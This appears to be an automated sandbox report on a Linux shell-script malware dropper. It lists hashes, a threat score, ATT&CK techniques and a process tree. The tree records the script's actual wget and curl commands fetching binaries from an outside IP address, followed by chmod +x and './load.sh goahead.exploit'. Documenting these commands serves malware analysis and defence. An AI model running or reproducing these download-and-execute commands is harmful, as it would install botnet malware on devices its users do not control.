92db80ff0a69312f362597f8b92ce9e6259384338e67d246f87549dbbae8597e

Analysis

max time kernel
149s
max time network
154s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
17-10-2024 07:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MO5UK_na.sh
Size

4KB
MD5

ab9ca96b70ab2766af19b4f66ca51983
SHA1

408dd59c1315ef7a8e4f24a1ba88f37e4a81afb4
SHA256

92db80ff0a69312f362597f8b92ce9e6259384338e67d246f87549dbbae8597e
SHA512

de536cc21e3801d8eadd752a01023966d0508b0511b212f5c3d98636c764b27cb15c8fab6141104f1613b997e7d6d4ee6b230f1ea4a1e534c044082304c0d54a
SSDEEP

96:vNVj8Nw4fNx/gNN7UNdMdEpFlNn9iNUsTN2mRNRfQN3tqNuehNyS9NGWpNPll:oO4FK

Score

7^/10

defense_evasion discovery upx

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
718	chmod
805	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/load.sh	720	load.sh
/tmp/load.sh	806	load.sh

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-1.dat	upx
behavioral4/files/fstream-4.dat	upx

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
722	wget
725	curl
804	cat

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86	curl
File opened for modification	/tmp/load.sh	MO5UK_na.sh
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mips	wget
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mips	curl
File opened for modification	/tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl	wget

/tmp/MO5UK_na.sh
/tmp/MO5UK_na.sh
1⤵
- Writes file to tmp directory
PID:690
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Writes file to tmp directory
  PID:693
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:704
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.x86
  2⤵
  PID:717
- /bin/chmod
  chmod +x db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh MO5UK_na.sh systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-Rq3dNx
  2⤵
  - File and Directory Permissions Modification
  PID:718
- /tmp/load.sh
  ./load.sh goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:720
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:722
- /usr/bin/curl
  curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:725
- /bin/cat
  cat db0fa4b8db0333367e9bda3ab68b8042.mips
  2⤵
  - System Network Configuration Discovery
  PID:804
- /bin/chmod
  chmod +x db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh MO5UK_na.sh
  2⤵
  - File and Directory Permissions Modification
  PID:805
- /tmp/load.sh
  ./load.sh goahead.exploit
  2⤵
  - Executes dropped EXE
  PID:806
- /usr/bin/wget
  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
  2⤵
  - Writes file to tmp directory
  PID:808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

Filesize
33KB

MD5
6d1b6e91b1e2037fbf62ca7ddcf04932

SHA1
d0769095ec2e678074eb206b3537022129c1a776

SHA256
7f307860b88d639313ebd4195f1ef6a8d668d1941c6cbf6dc968961b1fe42782

SHA512
7397ef3b4f7d34b0637de721f38ac833ad6d526e9b7cdbc08fdb4b261fa675001a8079ff4b9378fa219090a945126832cb1ab3db86b35da0090b20051d31bb38

Download Submit
/tmp/load.sh

Filesize
35KB

MD5
fd5d7deebbb62aee931a1701a1042450

SHA1
4adc94ce9de13647815a16d6514b73e109c80785

SHA256
7a36bd7a9d19b6d48807264712141dd0543ffebd9db923a76799ffd687f352c9

SHA512
cb7beeb8d88ad48ac447b69b215738cdf1d706cb88c4945d0a0837c07dfe41a74107f9c4d7fccc5c7e5719ee9a912452ba3c53c360252bd46978f5d27c1b6df4

Download Submit